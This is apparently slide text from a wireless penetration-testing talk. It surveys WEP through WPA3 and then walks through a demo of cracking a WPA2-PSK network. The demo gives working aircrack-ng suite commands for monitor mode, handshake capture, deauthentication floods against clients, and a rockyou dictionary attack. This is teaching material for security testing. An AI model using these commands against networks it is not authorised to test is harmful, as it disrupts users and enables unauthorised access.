2. Background
Wireless penetration tests, commonly
known as wireless pentests, typically
assess three main aspects of a wireless
network:
• Range
• Data Security
• Unauthorized Access
3. 3
Wireless Network Penetration Testing
Wired Equivalent Privacy (WEP)
The
Evolution of
WLAN
Security
• 802.11 – First Wireless Local Area
Network (WLAN) standard
• Open System Authentication (OSA)
• Shared Key Authentication (SKA)
• Pre-Shared Key (PSK) 64 – 128 bits
• PSK sent in plain text
• WEP protocol should not be used
3.59% of networks still use WEP
– WiGLE.net/stats
4. 4
Wireless Network Penetration Testing
Wi-Fi Protected Access (WPA)
The
Evolution of
WLAN
Security
• Established by the Wi-Fi Alliance, under
802.11i
• Pre-Shared Key (PSK) 256 bits and salted
• Temporal Key Integrity Protocol (TKIP)
• WPA Personal
• Launched hastily
• Should not be used
3.48% of networks still use WPA
– WiGLE.net/stats
5. 5
Wireless Network Penetration Testing
Wi-Fi Protected Access 2 (WPA2)
The
Evolution of
WLAN
Security
• Second WLAN standard established by the
Wi-Fi Alliance, under 802.11i
• Significant advancement in security over
WPA
• Advanced Encryption Standard (AES) 128
bits
• Counter Mode Cipher Block Chaining
Message Authentication Code Protocol
(CCM Protocol or CCMP)
• Management Frame Protection (MFP) for
enterprise
• Susceptible to deauthentication attacks
73.09% of networks use WPA2
– WiGLE.net/stats
6. 6
Wireless Network Penetration Testing
Wi-Fi Protected Access 3 (WPA3)
The
Evolution of
WLAN
Security
• Third WLAN standard established by the
Wi-Fi Alliance, under 802.11ax
• Diffie-Hellman Key Exchange
• Personal and Enterprise
• Personal: CCMP-128 (AES-128 in CCM
mode)
• Enterprise: Restricts algorithms used 192-
bit keys (AES-256 in GCM mode with
SHA-384 as HMAC)
• Not supported by older/embedded
interfaces
• Downgrade/side-channel attacks
0.32% of networks use WPA3
– WiGLE.net/stats
8. Cracking
WPA2-PSK
Background
How the four-way handshake works
1. AP → Client (Message 1): AP sends a ANonce) to the client
2. Client → AP (Message 2): The client creates a SNonce, some
hashes, and sends the SNonce & ANonce back to the AP
3. AP → Client (Message 3): The AP sends a confirmation with the
ANonce, SNonce, and hashes, back to the client
4. Client → AP (Message 4): The client sends the AP a confirmation
8
DEMO
PRE-
GAME
How de-authentication works
When a device wants to disconnect, it sends a deauthentication frame
to the AP. This is a normal part of Wi-Fi operation.
Deauth Attacks
• Attacker sends fraudulent deauthentication frames to a target device
• Frames pretend to be from the AP
• Device disconnects and attempts to reconnect to the AP
10. Wireless
Scanning &
Discovery
Enable monitor mode on the wireless interface card
• sudo airmon-ng start wlan0
Identify the channel your target AP is operating on
Note the BSSID (MAC address), Channel, and the ESSID (Network Name). Once
you’ve identified the AP information, use CTRL-C to exit.
• sudo airodump-ng wlan0
10
DEMO
11. Capture
Four-Way
Handshake
With monitor mode enabled on the wireless interface card,
start airodump-ng
• sudo airodump-ng -c 149 --bssid <macaddress> -w handshake wlan0
As wireless clients connect to this AP, they will appear under the STATION column
and will report the BSSID of the AP they are connecting to.
11
DEMO
12. 12
Real life picture of
me waiting to
passively capture
a
four-way
handshake
Capture
Four-Way
Handshake
DEMO
13. Deauth-
Attack
In a separate terminal, run aireplay-ng
• sudo aireplay-ng -0 5 -a <apmacaddress> -c <clientmacaddress> wlan0
If you don't know the MAC address of a specific client, you can still send
deauthentication packets to all clients connected to the AP. You do this by omitting
the `-c` option from your command:
• sudo aireplay-ng -0 5 -a <apmacaddress> wlan0
13
DEMO
14. Capture
Four-Way
Handshake
14
DEMO
Success!
In your four-way handshake airodump-ng terminal, you will know when you have
captured the four-way handshake when you see the "WPA handshake" message
next to the target BSSID. This took several tries.
15. Dictionary
Attack
Using the rockyou wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <apmacaddress> <name of outputfile>
*Make sure you specify the .cap output file that was generated
15
DEMO